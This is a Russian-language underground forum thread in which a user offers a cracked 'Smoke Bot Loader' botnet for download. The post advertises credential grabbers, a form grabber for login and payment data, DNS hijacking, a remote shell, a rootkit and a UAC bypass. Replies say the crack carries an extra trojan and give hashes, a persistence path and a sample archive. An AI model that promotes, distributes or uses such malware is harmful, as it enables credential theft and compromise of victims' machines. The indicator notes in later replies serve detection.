Smoke Bot Loader # Cracked

  • Автор темы Kairos
  • Дата начала
  • Ответы 17
  • Просмотры 1K
  • Теги
    botnet

Kairos

Пользователь
Пользователь

Kairos

Пользователь
Пользователь

Smoke Bot Loader
Преимущества:
- наличие модулей-плагинов, которые расширяют функционал бота, при этом не влияют на размер бота
- подробная статистика по версия системы, странам и онлайну
- подробная статистика по заданиям, загрузки / запуски, ограничение на количество и т.п.
- задания для бота на загрузку EXE или DLL (LoadLibrary, regsvr32)
- гео-таргетинг (выборочные загрузки только для конкретных стран или блокировка для определенных стран)
- загрузка задания с удаленного URL
- индивидуальное задание для каждого бота и поиск ботов по ID, стране или префиксу селлера
- незаметная установка в системе, защита собственных файлов и записей в реестре *
- самообновление бота через админку (локально или удаленно) *
- резервный URL для остука *
- возможность использования перфиксов для селлеров (более точная статистика и разделение заданий)
- статистика по повторным запускам (удобно для оценки качества загрузок или трафика) *
- "гостевой" доступ к статистике заданий
- антиотладка, антиэмуляция, детектирование "песочниц" и виртуальных машин
- легок в криптовании (не содержит в себе дополнительных DLL, оверлеев, TLS, всего одна секция кода)
- ring-3 rootkit, скрывает процесс, файлы и записи в реестре от пользователя, только для х32 систем
- работа в Windows XP-8 x32/x64
- небольшой размер лоадера ~ 7-14 Кб **

* - только для резидентной версии
** - в зависимости от версии

Модули:
- модуль (две версии) в виде граббера паролей известных программ для работы с сетью (IM клиенты, браузеры, FTP, Mail и покерные программы и др.), все пароли собираются и отсылаются в админку, откуда их можно легко скачать

Функционал граббера LITE:
- FTP клиенты
Code:
32bit FTP, BitKinex, BulletProof FTP Client, Classic FTP, CoffeeCup FTP, Core FTP, CuteFTP, Directory Opus, ExpanDrive, FAR Manager FTP, FFFTP, FileZilla, FlashFXP, Fling, FreeFTP/DirectFTP, Frigate3 FTP, FTP Commander, FTP Control, FTP Explorer, FTP Navigator, FTP Uploader, FTPRush, LeapFTP, NetDrive, SecureFX, SmartFTP, SoftX FTP Client, TurboFTP, UltraFXP, WebDrive, WebSitePublisher, Windows/Total Commander, WinSCP, WS_FTP
- Браузеры
Code:
Apple Safari, Flock, Google Chrome, Internet Explorer, Mozilla Browser, Mozilla Firefox, Mozilla Thunderbird, Opera, SeaMonkey
- Dialers & RDP
- Downloaders

Функционал граббера FULL:
- Все возможности LITE
- IM клиенты
Code:
&RQ, AIM Pro, Digsby, Excite Private Messenger, Faim, GAIM, Gizmo Project, Google Talk, ICQ/AIM, ICQ2003/Lite, ICQ99b-2002, IM2 (Messenger 2), JAJC, Miranda, MSN Messenger, MySpaceIM, Odigo, Paltalk, Pandion, Pidgin, PSI, QIP, QIP.Online, SIM, Trillian, Trillian Astra, Windows Live Messenger, Yahoo! Messenger
- Poker клиенты
Code:
Absolute Poker, Cake Poker, Full Tilt Poker, Party Poker, PokerStars, Titan Poker
- Mail клиенты
Code:
Becky Internet Mail, Eudora, Forte Agent, Gmail Notifier, Group Mail Free, IncrediMail, Mail Commander, Mail.Ru Agent, Outlook, PocoMail, POP Peeper, Scribe, The Bat!, Vypress Auvis, Windows Live Mail
- SOCKS - позволяет использовать ботов в качестве Socks5 Proxy (не бекконект, не обходит NAT), имеется возможность ограничить доступ по IP

- HOSTS - подмена IP-адресов для определенных сайтов через hosts-файл

- CMD SHELL - бесплатный модуль, доступный всем владельцам резидентной версии бота, позволяет выполнить консольное приложение, результат работы которой отправляется админку, например - "ipconfig /all"

- FORM GRAB - формграббер, работающий в реальном времени с браузерами (IE, FF, Opera, Chrome), перехватываются все POST запросы форм (авторизации, платежные данные и т.п), поддержка HTTPS, поиск в админке по части URL

- PASS SNIF - сниффер паролей, работающий в реальном времени со всеми приложениями, умеет перехватывать пароли от FTP и POP3, данные отправляются в админку

- FAKE DNS - продвинутая подмена DNS, работает в реальном времени со всеми приложениями, позволяет изменить IP-адрес для домена согласно правилу, которое задается в админке в виде: site.ru=127.0.0.1

Обходы:
UAC Vista/Win7/Win8 - отлично работает даже на ограниченных учетках
Резидентная версия бота имеет улучшенный вариант **, который на данный момент обходит большинство проактивных защит.

Комплектация:
- лоадер
- билдер префиксов для "селлеров"
- админка (PHP, MySQL)
- модули (при их покупке)
- парсер логов LITE/FULL граббера с инструкцией
|
Пожалуйста , Вход или Регистрация чтобы увидеть ссылку!
|
пароль: Lab​
 
Последнее редактирование:

Kotun

Интересующийся
Участник

Kotun

Интересующийся
Участник

Админ , крыс почему не банишь ?

проблема с загрузкой гифа. - см ссыль --->>>
Пожалуйста , Вход или Регистрация чтобы увидеть ссылку!




JJJJTTT.jpg
Безымянный проект.gif
 
Последнее редактирование:

Adidas

Пользователь
Пользователь

Adidas

Пользователь
Пользователь

А какого года кряк? Ктото проверял на клей и прочее?
 

࿗ 𝕯𝖚𝖐𝖊 𝕰𝖚𝖌𝖊𝖓𝖊 ࿗

Администратор
Команда форума
Админ

࿗ 𝕯𝖚𝖐𝖊 𝕰𝖚𝖌𝖊𝖓𝖊 ࿗

Администратор
Команда форума
Админ

Kotun

Интересующийся
Участник

Kotun

Интересующийся
Участник

Какие крысы, ты о чем?
зы : не ТЫ , а ВЫ !
зыы : Админу призвано - банить троянщегоф , а не лайкать их темы.
зыыы : если юзер выложил склейку на форум не проверив на клей - юзер считается крысой и ловит перманент ,
или я не прав ?

Спешил фор Админс *( если скрина мало ) : --->>>
Пожалуйста , Вход или Регистрация чтобы увидеть ссылку!


--->>>> смотри внимательно ---->>>>
Пожалуйста , Вход или Регистрация чтобы увидеть ссылку!


и да , не мой косяк за то ранее .

hhhhtttttjjjjjiiii.jpg
 

࿗ 𝕯𝖚𝖐𝖊 𝕰𝖚𝖌𝖊𝖓𝖊 ࿗

Администратор
Команда форума
Админ

࿗ 𝕯𝖚𝖐𝖊 𝕰𝖚𝖌𝖊𝖓𝖊 ࿗

Администратор
Команда форума
Админ

зы : не ТЫ , а ВЫ !
зыы : Админу призвано - банить троянщегоф , а не лайкать их темы.
зыыы : если юзер выложил склейку на форум не проверив на клей - юзер считается крысой и ловит перманент ,
или я не прав ?

Спешил фор Админс *( если скрина мало ) : --->>>
Пожалуйста , Вход или Регистрация чтобы увидеть ссылку!


--->>>> смотри внимательно ---->>>>
Пожалуйста , Вход или Регистрация чтобы увидеть ссылку!


и да , не мой косяк за то ранее .

Посмотреть вложение 447
Ты, то есть Вы сударь умных книжек начитались или где выхватили сие правило?
Если идет копипаст, слив и т.п. то почему человек крыса, если он не создатель данной склейки?
Для этого темы и открыты, именно для обсуждения того, что тут есть, выявления склеек, ошибок и т.п.
Вот если пользователь селлер или кодер, продает свой малварь со склейкой, то тут бы я согласился, что крыса.
Если у тебя есть пруфы того, что он склеил данный малварь, то представь и тогда он улетит в вечный бан. Если получается ты его оскорбил напрасно, то надеюсь ты возьмешь свои слова обратно и извинишься перед ним.

Админ не обязан сидеть и все малвари, программы, експлоиты и все остальное проверять, помимо этого работы хватает.

Вот ты нашел в данной теме какие-то склейки, распиши значит об этом или можешь "почищенный" малварь скинуть сюда с просьбой обновить тему.
Вот это будет реальная помощь форуму, тем более молодому а не зарабатывать Медали (За троллинг пользователей или Вынос мозга) которыи на днях у нас появятся))
Ну и так же, скорее всего уже сегодня появятся основные правила форума.

P.S. Надо помогать работать друг другу а не мозги делать.
 

Kotun

Интересующийся
Участник

Kotun

Интересующийся
Участник

Админ.
Я не пришёл на форум делать кому то мозги.
Я указал на факт !
А фактом является то , что юзер выложил софтину на форум , и НЕ удосужился её проверить на клей !
Более того ; ни кто из руководящего звена не соизволил проверить сие творение на клей .
но дружно пролайкать - не применули !
Умные книжки я читал когда Ваши родители ещё друг друга не знали , так то...
Про помощь форуму : а разве мой месседж и потраченное время на билд клипа и залив оного на хостинг,
для всеобщего лицезрения не есть помощь форуму и предостережение остальных мемберов от заразы ?
Или я что то не так понимаю в этой жизни ?

И да :

Выложенная ТС-ом дрянь - есть склейка ,
которая расклеивается в папку TEMP и от туда уже оба файла выполняют возложенные на них функции.
Желающие могут скачать и найти дропнутое добро в папке TEMP ,
если со зрением плохо и лень посмотреть клип и скрин .

JJJJTTT.jpg

и да : иными словами я могу щаз выложить тут склейку и объяснить своё рвение тем ,
что я не в курсе по поводу склейки и ваще взял всё на закрытом турецком борде ?
Лол .
Админ может и не обязан всё мониторить , а вот - Модераторы на что ?
Модераторы должны не приват сплойты выклянчивать на проверку , а модерировать форум !
То есть модерировать ВСЕ темы и все файлы выкладываемые мемберами на борде !
Ибо ламеру качнувшему склейку - будет глубоко по *ую кто и что выложил .
Для ламера будет --->>> на даркнете выкладывают склейки !!!
Вот так будет для ламера...
Имхо.
 

࿗ 𝕯𝖚𝖐𝖊 𝕰𝖚𝖌𝖊𝖓𝖊 ࿗

Администратор
Команда форума
Админ

࿗ 𝕯𝖚𝖐𝖊 𝕰𝖚𝖌𝖊𝖓𝖊 ࿗

Администратор
Команда форума
Админ

Админ.
Я не пришёл на форум делать кому то мозги.
Я указал на факт !
А фактом является то , что юзер выложил софтину на форум , и НЕ удосужился её проверить на клей !
Более того ; ни кто из руководящего звена не соизволил проверить сие творение на клей .
но дружно пролайкать - не применули !
Умные книжки я читал когда Ваши родители ещё друг друга не знали , так то...
Про помощь форуму : а разве мой месседж и потраченное время на билд клипа и залив оного на хостинг,
для всеобщего лицезрения не есть помощь форуму и предостережение остальных мемберов от заразы ?
Или я что то не так понимаю в этой жизни ?

И да :

Выложенная ТС-ом дрянь - есть склейка ,
которая расклеивается в папку TEMP и от туда уже оба файла выполняют возложенные на них функции.
Желающие могут скачать и найти дропнутое добро в папке TEMP ,
если со зрением плохо и лень посмотреть клип и скрин .

Посмотреть вложение 449

и да : иными словами я могу щаз выложить тут склейку и объяснить своё рвение тем ,
что я не в курсе по поводу склейки и ваще взял всё на закрытом турецком борде ?
Лол .
Админ может и не обязан всё мониторить , а вот - Модераторы на что ?
Модераторы должны не приват сплойты выклянчивать на проверку , а модерировать форум !
То есть модерировать ВСЕ темы и все файлы выкладываемые мемберами на борде !
Ибо ламеру качнувшему склейку - будет глубоко по *ую кто и что выложил .
Для ламера будет --->>> на даркнете выкладывают склейки !!!
Вот так будет для ламера...
Имхо.
Спасибо, что указал на склейку, другие пользователи уже будут видеть и знать, возможно найдется и такой, кто очистить данный малварь от "лишнего" и будет всем счастье.

P.S. Ну если у меня уже два внука, то представляю какого Вы возраста))))
 

Kotun

Интересующийся
Участник

Kotun

Интересующийся
Участник

P.S. Ну если у меня уже два внука, то представляю какого Вы возраста))))
Я при Лёне школу закончил .
Это тот Лёня , который Брежнев.
И ещё чего многого я успел при нём....

Темы не вижу про предложения по улучшению форума .

Ещё одно "НО"

На форуме у юзера под аваторкой виден емайл .
Сие действо есть великое палево на фоне всевозможных сервисов по пробиву и вскрытию мыльников.

так у меня :dance2::

111111111111.jpg

а вот так у юзеров :mosking: :

22222222222.jpg

МайлСру Не ломает только ленивый.
а получив доступ к мыльнику , взломщик получает доступ к форуму и аккаунту ,
возможно , уважаемого юзера , которому всецело доверяют.
И получается что модератор - в теории , может выложить малварь ( не сам и при помощи взломщика. )
Тот факт что многие юзают одну и туже почту для всего - поможет идентефицировать ,
а возможно в дальнейшем и шантажировать владельца мыла.

Админ , ты же сам читал про maza-in а ...
Там именно через мыло и протекло так то....


живой пример : ---->>>
Пожалуйста , Вход или Регистрация чтобы увидеть ссылку!

смотрим мой ответ дитятке ( внизу страницы )
 
Последнее редактирование:

࿗ 𝕯𝖚𝖐𝖊 𝕰𝖚𝖌𝖊𝖓𝖊 ࿗

Администратор
Команда форума
Админ

࿗ 𝕯𝖚𝖐𝖊 𝕰𝖚𝖌𝖊𝖓𝖊 ࿗

Администратор
Команда форума
Админ

Я при Лёне школу закончил .
Это тот Лёня , который Брежнев.
И ещё чего многого я успел при нём....

Темы не вижу про предложения по улучшению форума .

Ещё одно "НО"

На форуме у юзера под аваторкой виден емайл .
Сие действо есть великое палево на фоне всевозможных сервисов по пробиву и вскрытию мыльников.

так у меня :dance2::

Посмотреть вложение 450

а вот так у юзеров :mosking: :

Посмотреть вложение 451

МайлСру Не ломает только ленивый.
а получив доступ к мыльнику , взломщик получает доступ к форуму и аккаунту ,
возможно , уважаемого юзера , которому всецело доверяют.
И получается что модератор - в теории , может выложить малварь ( не сам и при помощи взломщика. )
Тот факт что многие юзают одну и туже почту для всего - поможет идентефицировать ,
а возможно в дальнейшем и шантажировать владельца мыла.

Админ , ты же сам читал про maza-in а ...
Там именно через мыло и протекло так то....


живой пример : ---->>>
Пожалуйста , Вход или Регистрация чтобы увидеть ссылку!

смотрим мой ответ дитятке ( внизу страницы )
У нас отключена функция восстановление пароля по мылу. Щас еще разберусь, как вообще это поле сделать не обязательным.
Восстановление пароля будет только в ручном режиме.
 

Samael666

Пользователь
Пользователь

Samael666

Пользователь
Пользователь

Почитал данную тему и регнулся, спасибо за хорошее настроение)
Я конечно не такой древний как вы, но Горбатого помню..
Не оч понятна идея протроянивания коллег по цеху, какой профит..
 

Adidas

Пользователь
Пользователь

Adidas

Пользователь
Пользователь

Посмотреть вложение 449

Походу дела у кебаб вирус вшит в этот билдер, склейку я не увидел через софт, еще и пишет что не запускать его на виртуалке и деде, а только на реальном компе.
 

Samael666

Пользователь
Пользователь

Samael666

Пользователь
Пользователь

Немного о склейке -
Все файлы накрыты VMP.
SmokeBuilder by KebabMan.exe - MD5 6A554715E93E5910DE7BC6D599C22F77
Дропает 2 файла в Temp -
1 файл - SmokeBuilder by KebabMan.exe - MD5 7661AB6304995EE7C1DB1F94C9131693
(этот билдер когда то я скачивал с 0dayexploits, без явной склейки на функционал/ левый отстук я толком не проверял, кажется билдил..)
2 файл (полезная нагрузка) - MD5 65890181506C953D408087DCA4E10AF2
Ждет пару минут затем дропается из Temp в Roaming затем инжектится в svchost.exe , ну и в авторан добавляется -
Найдено в: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
Путь: C:\Users\Admin\AppData\Roaming\Steam Extensions.exe
Куда стучит не перехватывал.
Если кому интересно подробнее о полезной нагрузке -
Пожалуйста , Вход или Регистрация чтобы увидеть ссылку!
Пожалуйста , Вход или Регистрация чтобы увидеть ссылку!
Пожалуйста , Вход или Регистрация чтобы увидеть ссылку!

Файлы - Билдер+склейка, билдер без склейки, полезная нагрузка, можно скачать -
Link -
Пожалуйста , Вход или Регистрация чтобы увидеть ссылку!

PASS - infected
 

Samael666

Пользователь
Пользователь

Samael666

Пользователь
Пользователь

хз)
Вот архив который у меня..
Пожалуйста , Вход или Регистрация чтобы увидеть ссылку!
PASS - infected
==================================================
PS В сообщении 16 у меня ошибка, заметил, но уже не мог редактировать..
Билдер "SmokeBuilder by KebabMan.exe" MD5 7661AB6304995EE7C1DB1F94C9131693 - не накрыт VMP, все остальное VMP.
 
Сверху Снизу